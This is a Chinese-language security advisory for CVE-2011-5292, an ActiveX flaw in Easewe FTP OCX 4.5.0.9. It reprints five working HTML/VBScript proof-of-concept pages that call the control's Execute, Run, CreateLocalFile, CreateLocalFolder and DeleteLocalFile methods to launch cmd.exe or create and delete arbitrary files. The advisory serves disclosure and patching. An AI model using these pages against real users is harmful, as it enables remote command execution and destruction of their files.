发布日期:2014-12-31
更新日期:2015-01-08
受影响系统:
Easewe Easewe FTP OCX ActiveX Control 4.5.0.9
描述:
CVE(CAN) ID: CVE-2011-5292
Easewe FTP OCX ActiveX Control是FTP activex组件,支持所有标准的ftp功能。
Easewe FTP OCX 4.5.0.9版本中,EaseWeFtp.ocx的EaseWeFtp.FtpLibrary ActiveX控件没有限制对某些方法的访问权限,这可使远程攻击者通过Execute或Run方法首个参数内的路径名,利用这些漏洞执行任意文件;通过CreateLocalFile方法参数内的路径名在任意文件内写;通过CreateLocalFolder方法参数内的路径名创建任意目录;通过DeleteLocalFile方法参数内的路径名删除任意文件。
<*来源:htbridge
链接:https://www.htbridge.com/advisory/HTB23015
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
htbridge ()提供了如下测试方法:
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Execute arg1 ,arg2 ,arg3
End Sub
</script>
</html>
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Run arg1 ,arg2 ,arg3
End Sub
</script>
</html>
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
target.CreateLocalFile arg1
End Sub
</script>
</html>
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="Directorypath\Directory"
target.CreateLocalFolder arg1
End Sub
</script>
</html>
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_delete"
target.DeleteLocalFile arg1
End Sub
</script>
</html>
建议:
厂商补丁:
Easewe
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: